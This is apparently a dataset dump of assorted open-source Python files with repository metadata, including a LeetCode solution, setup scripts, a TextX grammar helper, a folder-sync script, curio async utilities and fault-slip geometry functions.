auto_counts[auto_group].append(g)
for auto_group , sub_groups in sorted(auto_counts.items()):
print '{0[0]}.{0[1]} -- ({1})'.format(auto_group,sum(g['count'] for g in sub_groups))
for auto in sub_groups:
print "\t{0[auto]} -- ({0[count]})".format(auto)
| 29.961538
| 93
| 0.653402
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 109
| 0.139923
|
b1c3f31c631276e9ba4df0e85896052a590bb06f
| 942
|
py
|
Python
|
leetcode/medium/137-Single_number_II.py
|
shubhamoli/practice
|
5a24fdeb6e5f43b821ef0510fe3b343ddda18f22
|
[
"MIT"
] | 1
|
2020-02-25T10:32:27.000Z
|
2020-02-25T10:32:27.000Z
|
leetcode/medium/137-Single_number_II.py
|
shubhamoli/practice
|
5a24fdeb6e5f43b821ef0510fe3b343ddda18f22
|
[
"MIT"
] | null | null | null |
leetcode/medium/137-Single_number_II.py
|
shubhamoli/practice
|
5a24fdeb6e5f43b821ef0510fe3b343ddda18f22
|
[
"MIT"
] | null | null | null |
"""
Leetcode #137
"""
from typing import List
from collections import Counter
class Solution:
# linear but extra memory
def singleNumber(self, nums: List[int]) -> int:
if not nums:
return None
# O(n) operation
store = Counter(nums)
for i in nums:
if store[i] == 1:
return i
return None
def singleNumber_NO_SPACE(self, nums: List[int]) -> int:
if not nums:
return None
ones = 0;
twos = 0;
for i in nums:
ones = (~twos) & (ones ^ i)
twos = (~ones) & (twos ^ i)
return ones
if __name__ == "__main__":
solution = Solution()
assert solution.singleNumber([2,2,3,2]) == 3
assert solution.singleNumber([0,1,0,1,0,1,99]) == 99
assert solution.singleNumber_NO_SPACE([2,2,3,2]) == 3
assert solution.singleNumber_NO_SPACE([0,1,0,1,0,1,99]) == 99
| 19.625
| 65
| 0.541401
| 567
| 0.601911
| 0
| 0
| 0
| 0
| 0
| 0
| 76
| 0.080679
|
b1c431a1f0a698ee3cb88df0ac882e928a41cf16
| 1,133
|
py
|
Python
|
CS303/lab4-6/work/algorithm_ncs/ncs_client.py
|
Wycers/Codelib
|
86d83787aa577b8f2d66b5410e73102411c45e46
|
[
"MIT"
] | 22
|
2018-08-07T06:55:10.000Z
|
2021-06-12T02:12:19.000Z
|
CS303_Artifical-Intelligence/NCS/algorithm_ncs/ncs_client.py
|
Eveneko/SUSTech-Courses
|
0420873110e91e8d13e6e85a974f1856e01d28d6
|
[
"MIT"
] | 28
|
2020-03-04T23:47:22.000Z
|
2022-02-26T18:50:00.000Z
|
CS303/lab4-6/work/algorithm_ncs/ncs_client.py
|
Wycers/Codelib
|
86d83787aa577b8f2d66b5410e73102411c45e46
|
[
"MIT"
] | 4
|
2019-11-09T15:41:26.000Z
|
2021-10-10T08:56:57.000Z
|
import json
from algorithm_ncs import ncs_c as ncs
import argparse
parser = argparse.ArgumentParser(description="This is a NCS solver")
parser.add_argument("-c", "--config", default="algorithm_ncs/parameter.json", type=str, help="a json file that contains parameter")
parser.add_argument("-d", "--data", default="6", type=int, help="the problem dataset that need to be solved")
args = parser.parse_args()
"""
how to use it?
example:
python3 -m algorithm_ncs.ncs_client -d 12 -c algorithm_ncs/parameter.json
good luck!
"""
if __name__ == '__main__':
config_file = args.config
p = args.data
with open(config_file) as file:
try:
ncs_para = json.loads(file.read())
except:
raise Exception("not a json format file")
_lambda = ncs_para["lambda"]
r = ncs_para["r"]
epoch = ncs_para["epoch"]
n= ncs_para["n"]
ncs_para = ncs.NCS_CParameter(tmax=300000, lambda_exp=_lambda, r=r, epoch=epoch, N=n)
print("************ start problem %d **********" % p)
ncs_c = ncs.NCS_C(ncs_para, p)
ncs_res = ncs_c.loop(quiet=False, seeds=0)
print(ncs_res)
| 29.815789
| 131
| 0.655781
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 384
| 0.338923
|
b1c525fad1b20ec7dd22a4699a9e0a34d0093f34
| 1,999
|
py
|
Python
|
src/setup.py
|
umedoblock/fugou
|
45d95f20bba6f85764fb686081098d92fc8cdb20
|
[
"BSD-3-Clause"
] | null | null | null |
src/setup.py
|
umedoblock/fugou
|
45d95f20bba6f85764fb686081098d92fc8cdb20
|
[
"BSD-3-Clause"
] | 2
|
2018-11-25T12:06:08.000Z
|
2018-12-05T14:37:59.000Z
|
src/setup.py
|
umedoblock/fugou
|
45d95f20bba6f85764fb686081098d92fc8cdb20
|
[
"BSD-3-Clause"
] | null | null | null |
# name
# name of the package short string (1)
# version
# version of this release short string (1)(2)
# author
# package author’s name short string (3)
# author_email
# email address of the package author email address (3)
# maintainer
# package maintainer’s name short string (3)
# maintainer_email
# email address of the package maintainer email address (3)
# url
# home page for the package URL (1)
# description
# short, summary description of the package short string
# long_description
# longer description of the package long string (5)
# download_url
# location where the package may be downloaded URL (4)
# classifiers
# a list of classifiers list of strings (4)
# platforms
# a list of platforms list of strings
# license
# license for the package short string (6)
from distutils.core import setup, Extension
import sys
# print('sys.argv =', sys.argv)
# print('type(sys.argv) =', type(sys.argv))
if '--pg' in sys.argv:
suffix = '_pg'
sys.argv.remove('--pg')
else:
suffix = ''
# print('suffix =', suffix)
ext_name = '_par2' + suffix
module_par2 = \
Extension(ext_name, sources=[
'par2/par2/pypar2.c',
'par2/par2/libpar2.c'
],
)
ext_name = '_gcdext' + suffix
module_gcdext = \
Extension(ext_name, sources = ['ecc/ecc/_gcdext.c'],
)
ext_name = '_montgomery' + suffix
module_montgomery = \
Extension(ext_name, sources = ['montgomery/pymontgomery.c'])
ext_name = '_camellia' + suffix
module_camellia = \
Extension(ext_name, sources = ['camellia/pycamellia.c',
'camellia/camellia.c',
'libfugou.c'])
setup( name = 'fugou',
version = '8.0',
author = '梅濁酒(umedoblock)',
author_email = 'umedoblock@gmail.com',
url = 'empty',
description = 'This is a gcdext() package',
ext_modules = [
module_montgomery, module_gcdext, module_camellia
])
| 27.763889
| 64
| 0.630815
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,198
| 0.596317
|
b1c59e2da37dca10b24d9fc1fc1c500ca912a5d8
| 339
|
py
|
Python
|
setup.py
|
elcolumbio/cctable
|
798c46a833cb861d9e80cc52ab81cfc859c19d5e
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
elcolumbio/cctable
|
798c46a833cb861d9e80cc52ab81cfc859c19d5e
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
elcolumbio/cctable
|
798c46a833cb861d9e80cc52ab81cfc859c19d5e
|
[
"Apache-2.0"
] | null | null | null |
from setuptools import setup
setup(name='cctable',
version='0.3',
description='Frontend visualizing accouting data.',
url='github.com/elcolumbio/cctable',
author='Florian Benkö',
author_email='f.benkoe@innotrade24.de',
license='Apache License, Version 2.0 (the "License")',
packages=['cctable'])
| 30.818182
| 60
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 178
| 0.523529
|
b1c8b03e6d7fe1d0aa211ed21f9c71de064b475d
| 2,685
|
py
|
Python
|
scoff/misc/textx.py
|
brunosmmm/scoff
|
e1a0b5f98dd9e60f41f3f7cfcda9038ffd80e138
|
[
"MIT"
] | null | null | null |
scoff/misc/textx.py
|
brunosmmm/scoff
|
e1a0b5f98dd9e60f41f3f7cfcda9038ffd80e138
|
[
"MIT"
] | 1
|
2020-03-20T13:57:52.000Z
|
2021-03-11T17:25:25.000Z
|
scoff/misc/textx.py
|
brunosmmm/scoff
|
e1a0b5f98dd9e60f41f3f7cfcda9038ffd80e138
|
[
"MIT"
] | null | null | null |
"""Auto-generate custom TextX AST classes."""
import re
try:
import black
except ImportError:
black = None
GRAMMAR_RULE_REGEX = re.compile(
r"([a-zA-Z_]\w*)\s*:(((['\"];['\"])|[^;])+);", re.S
)
RULE_MEMBER_REGEX = re.compile(
r"([a-zA-Z_]\w*)\s*([?\+\*]?)=\s*([^\s]+)", re.S
)
if black is not None:
BLACK_FILE_MODE = black.FileMode(line_length=79)
def parse_textx_rule(rule_definition):
"""Parse a rule definition."""
members = re.findall(RULE_MEMBER_REGEX, rule_definition)
# shortcut to optional members
revised_members = []
for member in members:
name, operator, value = member
if value.endswith("?"):
operator = "?"
revised_members.append((name, operator, value))
return [(member[0], member[1]) for member in revised_members]
def parse_textx_grammar(grammar_file):
"""Parse grammar file."""
with open(grammar_file, "r") as f:
contents = f.read()
rules = re.findall(GRAMMAR_RULE_REGEX, contents)
grammar_rules = {}
for rule in rules:
rule_name = rule[0]
rule_body = rule[1]
rule_members = parse_textx_rule(rule_body.strip())
if len(rule_members) < 1:
continue
grammar_rules[rule_name.strip()] = rule_members
return grammar_rules
def build_python_class_text(class_name, subclass_of, *members):
"""Build python class declaration."""
member_arguments = []
optional_arguments = []
for member in members:
member_name, member_operator = member
if member_operator in ("?", "*"):
# optional
optional_arguments.append("{name}=None".format(name=member_name))
else:
member_arguments.append(member_name)
member_arguments.extend(optional_arguments)
class_contents = """
class {name}({parent_class}):
\"\"\"{name} AST.\"\"\"
__slots__ = ({slots})
def __init__(self, parent, {members}, **kwargs):
\"\"\"Initialize.\"\"\"
super().__init__(parent=parent, {member_assign}, **kwargs)
""".format(
name=class_name,
parent_class=subclass_of,
members=", ".join(member_arguments),
slots=", ".join(
[
'"{}"'.format(member[0])
for member in members
if member != "parent"
]
),
member_assign=", ".join(
["{name}={name}".format(name=member[0]) for member in members]
),
)
if black is not None:
return (
class_name,
black.format_str(class_contents, mode=BLACK_FILE_MODE),
)
else:
return (class_name, class_contents)
| 27.680412
| 77
| 0.587337
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 580
| 0.216015
|
b1c9b912939d5da977a0f0ba07c635174c5f0f28
| 683
|
py
|
Python
|
scripts/runTests.py
|
RDFLib/pymicrodata
|
a4e2d82d092316f0742902227664bf691be6c17f
|
[
"W3C-20150513"
] | 25
|
2015-01-30T13:35:32.000Z
|
2021-12-29T18:42:35.000Z
|
scripts/runTests.py
|
RDFLib/pymicrodata
|
a4e2d82d092316f0742902227664bf691be6c17f
|
[
"W3C-20150513"
] | 7
|
2016-01-23T18:01:01.000Z
|
2020-12-22T16:27:38.000Z
|
scripts/runTests.py
|
RDFLib/pymicrodata
|
a4e2d82d092316f0742902227664bf691be6c17f
|
[
"W3C-20150513"
] | 4
|
2016-04-30T23:37:56.000Z
|
2019-03-24T20:56:32.000Z
|
#!/usr/bin/env python
"""
Run the microdata testing locally
"""
# You may want to adapt this to your environment...
import sys
sys.path.append("..")
import glob
from pyMicrodata import pyMicrodata
from rdflib import Graph
###########################################
# marshall all test HTML files
test_path = "../tests/"
test_html_files = glob.glob(test_path + "*.html")
# create the testing object
processor = pyMicrodata()
# for each HTML file...
for f in test_html_files:
print("trying {}".format(f))
g1 = Graph().parse(data=processor.rdf_from_source(f), format="turtle")
g2 = Graph().parse(f.replace("html", "ttl"), format="turtle")
assert g1.isomorphic(g2)
| 24.392857
| 74
| 0.657394
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 297
| 0.434846
|
b1ca7d47ebdd386eeb55838e16468d553751ab0a
| 2,910
|
py
|
Python
|
DeleteBackupFiles/deletebackupfile.py
|
Liuzkai/PythonScript
|
fb21ad80e085f6390ae970b81404f7e5c7923f4e
|
[
"MIT"
] | 1
|
2021-01-16T16:09:33.000Z
|
2021-01-16T16:09:33.000Z
|
DeleteBackupFiles/deletebackupfile.py
|
Liuzkai/PythonScript
|
fb21ad80e085f6390ae970b81404f7e5c7923f4e
|
[
"MIT"
] | null | null | null |
DeleteBackupFiles/deletebackupfile.py
|
Liuzkai/PythonScript
|
fb21ad80e085f6390ae970b81404f7e5c7923f4e
|
[
"MIT"
] | 1
|
2021-01-16T16:09:36.000Z
|
2021-01-16T16:09:36.000Z
|
# -*- coding: utf-8 -*-
# https://oldj.net/
u"""
同步两个文件夹
用法:
python syncdir.py source_dir target_dir
执行后,source_dir 中的文件将被同步到 target_dir 中
这个同步是单向的,即只将 source_dir 中更新或新增的文件拷到 target_dir 中,
如果某个文件在 source_dir 中不存在而在 target_dir 中存在,本程序不会删除那个文件,
也不会将其拷贝到 source_dir 中
判断文件是否更新的方法是比较文件最后修改时间以及文件大小是否一致
"""
import os
import sys
import shutil
def errExit(msg):
print("-" * 50)
print("ERROR:")
print(msg)
sys.exit(1)
def main(source_dir, target_dir):
print("synchronize '%s' >> '%s'..." % (source_dir, target_dir))
print("=" * 50)
sync_file_count = 0
sync_file_size = 0
for root, dirs, files in os.walk(source_dir):
if "backup" not in root and ".git" not in root:
relative_path = root.replace(source_dir, "")
if len(relative_path) > 0 and relative_path[:1] in ("/", "","\\"):
relative_path = relative_path[1:]
dist_path = os.path.join(target_dir, relative_path)
if not os.path.isdir(dist_path) :
os.makedirs(dist_path)
last_copy_folder = ""
for fn0 in files:
fn = os.path.join(root, fn0)
fn2 = os.path.join(dist_path, fn0)
is_copy = False
if not os.path.isfile(fn2):
is_copy = True
else:
statinfo = os.stat(fn)
statinfo2 = os.stat(fn2)
is_copy = (
round(statinfo.st_mtime, 3) != round(statinfo2.st_mtime, 3)
or statinfo.st_size != statinfo2.st_size
)
if is_copy:
if dist_path != last_copy_folder:
print("[ %s ]" % dist_path)
last_copy_folder = dist_path
print("copying '%s' ..." % fn0)
shutil.copy2(fn, fn2)
sync_file_count += 1
sync_file_size += os.stat(fn).st_size
if sync_file_count > 0:
print("-" * 50)
print("%d files synchronized!" % sync_file_count)
if sync_file_size > 0:
print("%d bytes." % sync_file_size)
print("done!")
if __name__ == "__main__":
# if len(sys.argv) != 3:
# if "-h" in sys.argv or "--help" in sys.argv:
# print(__doc__)
# sys.exit(1)
# errExit(u"invalid arguments!")
# source_dir, target_dir = sys.argv[1:]
# if not os.path.isdir(source_dir):
# errExit(u"'%s' is not a folder!" % source_dir)
# elif not os.path.isdir(target_dir):
# errExit(u"'%s' is not a folder!" % target_dir)
source_dir = "D:\\UGit\\HoudiniDigitalAssetSet"
target_dir = "D:\\NExTWorkSpace\\ArkWorkSpace\\Projects\\Ark2019\\Trunk\\UE4NEXT_Stable\\Engine\\Binaries\\ThirdParty\\Houdini\\HoudiniDigitalAssetSet"
main(source_dir, target_dir)
| 30.957447
| 155
| 0.55189
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,234
| 0.391995
|
b1cc39d59dda967c7dcf371addd5df5990b99e23
| 5,004
|
py
|
Python
|
enkube/util.py
|
rfairburn/enkube-1
|
47910bbcc05a40a5b32c97d44aab9ca5c7038ed0
|
[
"Apache-2.0"
] | null | null | null |
enkube/util.py
|
rfairburn/enkube-1
|
47910bbcc05a40a5b32c97d44aab9ca5c7038ed0
|
[
"Apache-2.0"
] | 2
|
2019-12-03T20:05:03.000Z
|
2021-09-30T17:37:45.000Z
|
enkube/util.py
|
rfairburn/enkube-1
|
47910bbcc05a40a5b32c97d44aab9ca5c7038ed0
|
[
"Apache-2.0"
] | 1
|
2019-12-03T19:23:05.000Z
|
2019-12-03T19:23:05.000Z
|
# Copyright 2018 SpiderOak, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import json
import yaml
import pyaml
import threading
from functools import wraps
from collections import OrderedDict
from pprint import pformat
from pygments import highlight, lexers, formatters
import curio
from curio.meta import (
curio_running, _from_coroutine, _isasyncgenfunction, finalize)
from curio.monitor import Monitor
def load_yaml(stream, Loader=yaml.SafeLoader, object_pairs_hook=OrderedDict, load_doc=False):
class OrderedLoader(Loader):
pass
def construct_mapping(loader, node):
loader.flatten_mapping(node)
return object_pairs_hook(loader.construct_pairs(node))
OrderedLoader.add_constructor(
yaml.resolver.BaseResolver.DEFAULT_MAPPING_TAG, construct_mapping)
if load_doc:
return list(yaml.load_all(stream, OrderedLoader))
return yaml.load(stream, OrderedLoader)
def format_json(obj, sort_keys=True):
return highlight(
json.dumps(obj, sort_keys=sort_keys, indent=2),
lexers.JsonLexer(),
formatters.TerminalFormatter()
)
def format_yaml(obj, prefix='---\n'):
return highlight(
prefix + pyaml.dumps(obj, safe=True).decode('utf-8'),
lexers.YamlLexer(),
formatters.TerminalFormatter()
)
def format_diff(diff):
return highlight(diff, lexers.DiffLexer(), formatters.TerminalFormatter())
def format_python(obj):
return highlight(
pformat(obj),
lexers.PythonLexer(),
formatters.TerminalFormatter()
)
def flatten_kube_lists(items):
for obj in items:
if obj.get('kind', '').endswith('List'):
for obj in flatten_kube_lists(obj['items']):
yield obj
else:
yield obj
_locals = threading.local()
def get_kernel():
try:
return _locals.curio_kernel
except AttributeError:
_locals.curio_kernel = k = curio.Kernel()
if 'CURIOMONITOR' in os.environ:
m = Monitor(k)
k._call_at_shutdown(m.close)
return k
def set_kernel(kernel):
_locals.curio_kernel = kernel
def close_kernel():
try:
k = _locals.curio_kernel
except AttributeError:
return
k.run(shutdown=True)
del _locals.curio_kernel
def sync_wrap(asyncfunc):
if _isasyncgenfunction(asyncfunc):
def _gen(*args, **kwargs):
k = get_kernel()
it = asyncfunc(*args, **kwargs)
f = finalize(it)
sentinal = object()
async def _next():
try:
return await it.__anext__()
except StopAsyncIteration:
return sentinal
k.run(f.__aenter__)
try:
while True:
item = k.run(_next)
if item is sentinal:
return
yield item
finally:
k.run(f.__aexit__, *sys.exc_info())
@wraps(asyncfunc)
def wrapped(*args, **kwargs):
if _from_coroutine() or curio_running():
return asyncfunc(*args, **kwargs)
else:
return _gen(*args, **kwargs)
else:
@wraps(asyncfunc)
def wrapped(*args, **kwargs):
if _from_coroutine() or curio_running():
return asyncfunc(*args, **kwargs)
else:
return get_kernel().run(asyncfunc(*args, **kwargs))
wrapped._awaitable = True
return wrapped
class AsyncInstanceType(curio.meta.AsyncInstanceType):
__call__ = sync_wrap(curio.meta.AsyncInstanceType.__call__)
class AsyncObject(metaclass=AsyncInstanceType):
pass
class SyncIterWrapper:
_sentinel = object()
def __init__(self, aiter):
self._aiter = aiter
@sync_wrap
async def _anext(self):
try:
return await self._aiter.__anext__()
except StopAsyncIteration:
return self._sentinel
def __next__(self):
item = self._anext()
if item is self._sentinel:
raise StopIteration()
return item
class SyncIter:
def __iter__(self):
return SyncIterWrapper(self.__aiter__())
class SyncContextManager:
@sync_wrap
async def __enter__(self):
return await self.__aenter__()
@sync_wrap
async def __exit__(self, typ, val, tb):
return await self.__aexit__(typ, val, tb)
| 25.927461
| 93
| 0.632894
| 948
| 0.189448
| 1,470
| 0.293765
| 818
| 0.163469
| 474
| 0.094724
| 615
| 0.122902
|
b1cf5ce6c13872161132303618fee46973f05973
| 7,588
|
py
|
Python
|
culpable/fault_projections.py
|
cossatot/at_fault
|
63beba4d616e89ebb4c2eaf48230717a4179d4e2
|
[
"MIT"
] | 3
|
2019-12-09T05:25:04.000Z
|
2021-04-25T14:55:25.000Z
|
culpable/fault_projections.py
|
cossatot/culpable
|
63beba4d616e89ebb4c2eaf48230717a4179d4e2
|
[
"MIT"
] | 9
|
2016-10-11T16:11:42.000Z
|
2017-01-04T21:17:27.000Z
|
culpable/fault_projections.py
|
cossatot/culpable
|
63beba4d616e89ebb4c2eaf48230717a4179d4e2
|
[
"MIT"
] | null | null | null |
import numpy as np
from numpy import sin, cos, tan, degrees, radians, arctan, arcsin
# Slip projections
## To/From offset
def offset_from_vert_sep(vert_sep, dip, rake=90.):
dip_slip = dip_slip_from_vert_sep(vert_sep, dip, rake)
return offset_from_dip_slip(dip_slip, dip, rake)
def vert_sep_from_offset(offset, dip, rake=90.):
dip_slip = dip_slip_from_offset(offset, dip, rake)
return vert_sep_from_dip_slip(dip_slip, dip, rake)
def offset_from_hor_sep(hor_sep, dip, rake=90.):
dip_slip = dip_slip_from_hor_sep(hor_sep, dip, rake)
return offset_from_dip_slip(dip_slip, dip, rake)
def hor_sep_from_offset(offset, dip, rake=90.):
dip_slip = dip_slip_from_offset(offset, dip, rake)
return hor_sep_from_dip_slip(dip_slip, dip, rake)
def offset_from_strike_slip(strike_slip, dip, rake=0.):
return strike_slip / cos( radians(rake))
def strike_slip_from_offset(offset, dip, rake=0.):
return offset * cos( radians(rake))
def offset_from_dip_slip(dip_slip, dip, rake=90.):
return dip_slip / sin( radians(rake))
def dip_slip_from_offset(offset, dip, rake=90.):
return offset * sin( radians(rake))
def heave_from_offset(offset, dip, rake=90.):
apparent_dip = apparent_dip_from_dip_rake(dip, rake)
return offset * cos( radians(apparent_dip))
def offset_from_heave(heave, dip, rake=90.):
apparent_dip = apparent_dip_from_dip_rake(dip, rake)
return heave / cos( radians(apparent_dip))
## Others
def beta_from_dip_rake(dip, rake):
'''
Returns beta, the angle (in degrees) between the strike and the
trend of apparent dip.
'''
return degrees( arctan( tan(radians(rake)) * cos(radians(dip))))
def apparent_dip_from_dip_rake(dip, rake):
return degrees( arcsin( sin(radians(dip)) * sin(radians(rake))))
def hor_sep_from_vert_sep(vert_sep, dip, rake=90.):
offset = offset_from_vert_sep(vert_sep, dip, rake)
return hor_sep_from_offset(offset, dip, rake)
def vert_sep_from_hor_sep(hor_sep, dip, rake=90.):
offset = offset_from_hor_sep(hor_sep, dip, rake)
return vert_sep_from_offset(offset, dip, rake)
def dip_slip_from_vert_sep(vert_sep, dip, rake=90.):
return vert_sep / sin(radians(dip))
def vert_sep_from_dip_slip(dip_slip, dip, rake=90.):
return dip_slip * sin(radians(dip))
def strike_slip_from_vert_sep(vert_sep, dip, rake=0.):
offset = offset_from_vert_sep(vert_sep, dip, rake)
return strike_slip_from_offset(offset, dip, rake)
def vert_sep_from_strike_slip(strike_slip, dip, rake=0.):
offset = offset_from_strike_slip(strike_slip, dip, rake)
return vert_sep_from_offset(offset, dip, rake)
def heave_from_vert_sep(vert_sep, dip, rake=90.):
offset = offset_from_vert_sep(vert_sep, dip, rake)
return heave_from_offset(offset, dip, rake)
def vert_sep_from_heave(heave, dip, rake=90.):
offset = offset_from_heave(heave, dip, rake)
return vert_sep_from_offset(offset, dip, rake)
def hor_sep_from_dip_slip(dip_slip, dip, rake=90.):
return dip_slip * cos(radians(dip))
def dip_slip_from_hor_sep(hor_sep, dip, rake=90.):
return hor_sep / cos(radians(dip))
def hor_sep_from_strike_slip(strike_slip, dip, rake=0.):
offset = offset_from_strike_slip(strike_slip, dip, rake)
return hor_sep_from_offset(offset, dip, rake)
def strike_slip_from_hor_sep(hor_sep, dip, rake=0.):
offset = offset_from_hor_sep(hor_sep, dip, rake)
return strike_slip_from_offset(offset, dip, rake)
def hor_sep_from_heave(heave, dip, rake=90.):
offset = offset_from_heave(heave, dip, rake)
return hor_sep_from_offset(offset, dip, rake)
def heave_from_hor_sep(hor_sep, dip, rake=90.):
offset = offset_from_hor_sep(hor_sep, dip, rake)
return heave_from_offset(offset, dip, rake)
def dip_slip_from_heave(heave, dip, rake=90.):
offset = offset_from_heave(heave, dip, rake)
return dip_slip_from_offset(offset, dip, rake)
def heave_from_dip_slip(dip_slip, dip, rake=90.):
offset = offset_from_dip_slip(dip_slip, dip, rake)
return heave_from_offset(offset, dip, rake)
def dip_slip_from_strike_slip(strike_slip, dip, rake):
offset = offset_from_strike_slip(strike_slip, dip, rake)
return dip_slip_from_offset(offset, dip, rake)
def strike_slip_from_dip_slip(dip_slip, dip, rake):
offset = offset_from_dip_slip(dip_slip, dip, rake)
return strike_slip_from_offset(offset, dip, rake)
def heave_from_strike_slip(strike_slip, dip, rake=0.):
hs = hor_sep_from_strike_slip(strike_slip, dip, rake)
return np.sqrt(strike_slip**2 + hs**2)
def strike_slip_from_heave(heave, dip, rake=0.):
offset = offset_from_heave(heave, dip, rake)
return strike_slip_from_offset(offset, dip, rake)
# aggregator functions
def slip_components_from_offset(offset, dip, rake):
slip_comps = {'offset' : offset}
slip_comps['hor_sep'] = hor_sep_from_offset(offset, dip, rake)
slip_comps['vert_sep'] = vert_sep_from_offset(offset, dip, rake)
slip_comps['dip_slip'] = dip_slip_from_offset(offset, dip, rake)
slip_comps['strike_slip'] = strike_slip_from_offset(offset, dip, rake)
slip_comps['heave'] = heave_from_offset(offset, dip, rake)
return slip_comps
def slip_components_from_hor_sep(hor_sep, dip, rake):
slip_comps = {'hor_sep' : hor_sep}
slip_comps['offset'] = offset_from_hor_sep(hor_sep, dip, rake)
slip_comps['vert_sep'] = vert_sep_from_hor_sep(hor_sep, dip, rake)
slip_comps['dip_slip'] = dip_slip_from_hor_sep(hor_sep, dip, rake)
slip_comps['strike_slip'] = strike_slip_from_hor_sep(hor_sep, dip, rake)
slip_comps['heave'] = heave_from_hor_sep(hor_sep, dip, rake)
return slip_comps
def slip_components_from_vert_sep(vert_sep, dip, rake):
slip_comps = {'vert_sep' : vert_sep}
slip_comps['hor_sep'] = hor_sep_from_vert_sep(vert_sep, dip, rake)
slip_comps['offset'] = offset_from_vert_sep(vert_sep, dip, rake)
slip_comps['dip_slip'] = dip_slip_from_vert_sep(vert_sep, dip, rake)
slip_comps['strike_slip'] = strike_slip_from_vert_sep(vert_sep, dip, rake)
slip_comps['heave'] = heave_from_vert_sep(vert_sep, dip, rake)
return slip_comps
def slip_components_from_dip_slip(dip_slip, dip, rake):
slip_comps = {'dip_slip' : dip_slip}
slip_comps['hor_sep'] = hor_sep_from_dip_slip(dip_slip, dip, rake)
slip_comps['vert_sep'] = vert_sep_from_dip_slip(dip_slip, dip, rake)
slip_comps['offset'] = offset_from_dip_slip(dip_slip, dip, rake)
slip_comps['strike_slip'] = strike_slip_from_dip_slip(dip_slip, dip, rake)
slip_comps['heave'] = heave_from_dip_slip(dip_slip, dip, rake)
return slip_comps
def slip_components_from_strike_slip(strike_slip, dip, rake):
slip_comps = {'strike_slip' : strike_slip}
slip_comps['hor_sep'] = hor_sep_from_strike_slip(strike_slip, dip, rake)
slip_comps['vert_sep'] = vert_sep_from_strike_slip(strike_slip, dip, rake)
slip_comps['dip_slip'] = dip_slip_from_strike_slip(strike_slip, dip, rake)
slip_comps['offset'] = offset_from_strike_slip(strike_slip, dip, rake)
slip_comps['heave'] = heave_from_strike_slip(strike_slip, dip, rake)
return slip_comps
def slip_components_from_heave(heave, dip, rake):
slip_comps = {'heave' : heave}
slip_comps['hor_sep'] = hor_sep_from_heave(heave, dip, rake)
slip_comps['vert_sep'] = vert_sep_from_heave(heave, dip, rake)
slip_comps['dip_slip'] = dip_slip_from_heave(heave, dip, rake)
slip_comps['strike_slip'] = strike_slip_from_heave(heave, dip, rake)
slip_comps['offset'] = offset_from_heave(heave, dip, rake)
return slip_comps
| 32.289362
| 78
| 0.741566
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 514
| 0.067739
|